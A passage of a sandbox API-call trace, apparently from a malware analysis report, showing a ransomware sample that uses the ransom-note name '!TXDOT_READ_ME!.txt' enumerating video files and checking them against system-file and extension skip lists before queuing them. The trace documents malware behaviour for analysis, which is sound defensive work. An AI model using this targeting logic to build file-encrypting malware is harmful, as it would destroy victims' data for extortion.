returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0076.459] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="8aR-oZ.mp4", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" [0076.459] PathFindExtensionW (pszPath="8aR-oZ.mp4") returned=".mp4" [0076.459] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="bootsect.bak") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="iconcache.db") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="thumbs.db") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2=" ransomware ") returned 1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2=" ransom ") returned 1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="debug.txt") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="boot.ini") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="desktop.ini") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="autorun.inf") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="ntuser.dat") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="ntldr") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="ntdetect.com") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="bootfont.bin") returned -1 [0076.459] StrCmpIW (psz1="8aR-oZ.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.459] PathFindExtensionW (pszPath="8aR-oZ.mp4") returned=".mp4" [0076.459] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0076.459] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.459] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.460] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.460] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.460] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\8aR-oZ.mp4" [0076.460] SetEvent (hEvent=0x3fc) returned 1 [0076.465] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2cf16450, ftCreationTime.dwHighDateTime=0x1d5ebab, ftLastAccessTime.dwLowDateTime=0x8698a780, ftLastAccessTime.dwHighDateTime=0x1d5e18c, ftLastWriteTime.dwLowDateTime=0x8698a780, ftLastWriteTime.dwHighDateTime=0x1d5e18c, nFileSizeHigh=0x0, nFileSizeLow=0x5135, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="hrFHHxEDNXCX.swf", cAlternateFileName="HRFHHX~1.SWF")) returned 1 [0076.465] StrCmpW (psz1="hrFHHxEDNXCX.swf", psz2=".") returned 1 [0076.465] StrCmpW (psz1="hrFHHxEDNXCX.swf", psz2="..") returned 1 [0076.465] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0076.469] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0076.469] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="hrFHHxEDNXCX.swf", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" [0076.469] PathFindExtensionW (pszPath="hrFHHxEDNXCX.swf") returned=".swf" [0076.469] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="bootsect.bak") returned 1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="iconcache.db") returned -1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="thumbs.db") returned -1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2=" ransomware ") returned 1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2=" ransom ") returned 1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="debug.txt") returned 1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="boot.ini") returned 1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="desktop.ini") returned 1 [0076.469] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="autorun.inf") returned 1 [0076.470] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="ntuser.dat") returned -1 [0076.470] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="ntldr") returned -1 [0076.470] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="ntdetect.com") returned -1 [0076.470] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="bootfont.bin") returned 1 [0076.470] StrCmpIW (psz1="hrFHHxEDNXCX.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.470] PathFindExtensionW (pszPath="hrFHHxEDNXCX.swf") returned=".swf" [0076.470] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0076.470] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.470] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.470] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.470] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.470] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\hrFHHxEDNXCX.swf" [0076.470] SetEvent (hEvent=0x3fc) returned 1 [0076.476] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dc5d30, ftCreationTime.dwHighDateTime=0x1d5e130, ftLastAccessTime.dwLowDateTime=0xd6268900, ftLastAccessTime.dwHighDateTime=0x1d5e666, ftLastWriteTime.dwLowDateTime=0xd6268900, ftLastWriteTime.dwHighDateTime=0x1d5e666, nFileSizeHigh=0x0, nFileSizeLow=0x11f84, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="P6NtF9p_sziw.mp4", cAlternateFileName="P6NTF9~1.MP4")) returned 1 [0076.476] StrCmpW (psz1="P6NtF9p_sziw.mp4", psz2=".") returned 1 [0076.476] StrCmpW (psz1="P6NtF9p_sziw.mp4", psz2="..") returned 1 [0076.476] StrCpyNW (in: psz1=0xed56d0, psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg" [0076.476] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg", psz2="\\", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\" [0076.476] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\", psz2="P6NtF9p_sziw.mp4", cchMax=1120 | out: psz1="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4") returned="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" [0076.476] PathFindExtensionW (pszPath="P6NtF9p_sziw.mp4") returned=".mp4" [0076.476] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="bootsect.bak") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="iconcache.db") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="thumbs.db") returned -1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2=" ransomware ") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2=" ransom ") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="debug.txt") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="boot.ini") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="desktop.ini") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="autorun.inf") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="ntuser.dat") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="ntldr") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="ntdetect.com") returned 1 [0076.476] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="bootfont.bin") returned 1 [0076.477] StrCmpIW (psz1="P6NtF9p_sziw.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.477] PathFindExtensionW (pszPath="P6NtF9p_sziw.mp4") returned=".mp4" [0076.477] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0076.477] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0076.477] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0076.477] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.477] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.477] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\P6NtF9p_sziw.mp4" [0076.477] SetEvent (hEvent=0x3fc) returned 1 [0076.481] FindNextFileW (in: hFindFile=0xec2130, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93dc5d30, ftCreationTime.dwHighDateTime=0x1d5e130, ftLastAccessTime.dwLowDateTime=0xd6268900, ftLastAccessTime.dwHighDateTime=0x1d5e666, ftLastWriteTime.dwLowDateTime=0xd6268900, ftLastWriteTime.dwHighDateTime=0x1d5e666, nFileSizeHigh=0x0, nFileSizeLow=0x11f84, dwReserved0=0x750e9f, dwReserved1=0x0, cFileName="P6NtF9p_sziw.mp4", cAlternateFileName="P6NTF9~1.MP4")) returned 0 [0076.761] FindClose (in: hFindFile=0xec2130 | out: hFindFile=0xec2130) returned 1 [0076.761] GetProcessHeap () returned 0xe30000 [0076.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed56d0 | out: hHeap=0xe30000) returned 1 [0076.761] FindNextFileW (in: hFindFile=0xec2730, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8ac050, ftCreationTime.dwHighDateTime=0x1d5e818, ftLastAccessTime.dwLowDateTime=0xe61c1560, ftLastAccessTime.dwHighDateTime=0x1d5e714, ftLastWriteTime.dwLowDateTime=0xe61c1560, ftLastWriteTime.dwHighDateTime=0x1d5e714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="YD6Z6S-cuGg", cAlternateFileName="YD6Z6S~1")) returned 0 [0076.761] FindClose (in: hFindFile=0xec2730 | out: hFindFile=0xec2730) returned 1 [0076.761] GetProcessHeap () returned 0xe30000 [0076.761] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0076.761] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5dd49c0, ftCreationTime.dwHighDateTime=0x1d5e6e9, ftLastAccessTime.dwLowDateTime=0x681af900, ftLastAccessTime.dwHighDateTime=0x1d5efa8, ftLastWriteTime.dwLowDateTime=0x681af900, ftLastWriteTime.dwHighDateTime=0x1d5efa8, nFileSizeHigh=0x0, nFileSizeLow=0x11a03, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="e7C5rm59mT0uP_9f.avi", cAlternateFileName="E7C5RM~1.AVI")) returned 1 [0076.761] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi", psz2=".") returned 1 [0076.761] StrCmpW (psz1="e7C5rm59mT0uP_9f.avi", psz2="..") returned 1 [0076.762] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.762] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0076.762] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="e7C5rm59mT0uP_9f.avi", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi") returned="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" [0076.762] PathFindExtensionW (pszPath="e7C5rm59mT0uP_9f.avi") returned=".avi" [0076.762] StrCmpW (psz1=".avi", psz2=".txd0t") returned -1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="bootsect.bak") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="iconcache.db") returned -1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="thumbs.db") returned -1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2=" ransomware ") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2=" ransom ") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="debug.txt") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="boot.ini") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="desktop.ini") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="autorun.inf") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="ntuser.dat") returned -1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="ntldr") returned -1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="ntdetect.com") returned -1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="bootfont.bin") returned 1 [0076.762] StrCmpIW (psz1="e7C5rm59mT0uP_9f.avi", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.762] PathFindExtensionW (pszPath="e7C5rm59mT0uP_9f.avi") returned=".avi" [0076.762] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".avi") returned 0x0 [0076.762] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.762] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.762] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.762] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.762] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\e7C5rm59mT0uP_9f.avi" [0076.762] SetEvent (hEvent=0x3fc) returned 1 [0076.768] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa1259ab0, ftCreationTime.dwHighDateTime=0x1d5ef86, ftLastAccessTime.dwLowDateTime=0x18935990, ftLastAccessTime.dwHighDateTime=0x1d5e23d, ftLastWriteTime.dwLowDateTime=0x18935990, ftLastWriteTime.dwHighDateTime=0x1d5e23d, nFileSizeHigh=0x0, nFileSizeLow=0x9826, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="gPsXouAw.flv", cAlternateFileName="")) returned 1 [0076.768] StrCmpW (psz1="gPsXouAw.flv", psz2=".") returned 1 [0076.768] StrCmpW (psz1="gPsXouAw.flv", psz2="..") returned 1 [0076.768] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.768] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0076.768] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="gPsXouAw.flv", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv") returned="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" [0076.768] PathFindExtensionW (pszPath="gPsXouAw.flv") returned=".flv" [0076.772] StrCmpW (psz1=".flv", psz2=".txd0t") returned -1 [0076.772] StrCmpIW (psz1="gPsXouAw.flv", psz2="bootsect.bak") returned 1 [0076.772] StrCmpIW (psz1="gPsXouAw.flv", psz2="iconcache.db") returned -1 [0076.776] StrCmpIW (psz1="gPsXouAw.flv", psz2="thumbs.db") returned -1 [0076.776] StrCmpIW (psz1="gPsXouAw.flv", psz2=" ransomware ") returned 1 [0076.776] StrCmpIW (psz1="gPsXouAw.flv", psz2=" ransom ") returned 1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="debug.txt") returned 1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="boot.ini") returned 1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="desktop.ini") returned 1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="autorun.inf") returned 1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="ntuser.dat") returned -1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="ntldr") returned -1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="ntdetect.com") returned -1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="bootfont.bin") returned 1 [0076.777] StrCmpIW (psz1="gPsXouAw.flv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.777] PathFindExtensionW (pszPath="gPsXouAw.flv") returned=".flv" [0076.777] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".flv") returned 0x0 [0076.777] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.777] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.777] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.777] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.777] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\gPsXouAw.flv" [0076.777] SetEvent (hEvent=0x3fc) returned 1 [0076.785] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cb156b0, ftCreationTime.dwHighDateTime=0x1d5e66a, ftLastAccessTime.dwLowDateTime=0xd911ff70, ftLastAccessTime.dwHighDateTime=0x1d5eb64, ftLastWriteTime.dwLowDateTime=0xd911ff70, ftLastWriteTime.dwHighDateTime=0x1d5eb64, nFileSizeHigh=0x0, nFileSizeLow=0x14f69, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="GsXmIOztESVB3CY.mp4", cAlternateFileName="GSXMIO~1.MP4")) returned 1 [0076.785] StrCmpW (psz1="GsXmIOztESVB3CY.mp4", psz2=".") returned 1 [0076.785] StrCmpW (psz1="GsXmIOztESVB3CY.mp4", psz2="..") returned 1 [0076.785] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0076.785] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0076.785] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="GsXmIOztESVB3CY.mp4", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4") returned="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4" [0076.785] PathFindExtensionW (pszPath="GsXmIOztESVB3CY.mp4") returned=".mp4" [0076.785] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="bootsect.bak") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="iconcache.db") returned -1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="thumbs.db") returned -1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2=" ransomware ") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2=" ransom ") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="debug.txt") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="boot.ini") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="desktop.ini") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="autorun.inf") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="ntuser.dat") returned -1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="ntldr") returned -1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="ntdetect.com") returned -1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="bootfont.bin") returned 1 [0076.786] StrCmpIW (psz1="GsXmIOztESVB3CY.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0076.786] PathFindExtensionW (pszPath="GsXmIOztESVB3CY.mp4") returned=".mp4" [0076.786] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0076.786] FileTimeToSystemTime (in: lpFileTime=0x552f44c, lpSystemTime=0x552f438 | out: lpSystemTime=0x552f438) returned 1 [0076.786] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f438, lpLocalTime=0x552f408 | out: lpLocalTime=0x552f408) returned 1 [0076.786] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0076.786] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0076.786] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\GsXmIOztESVB3CY.mp4", cchMax=32000 | out: 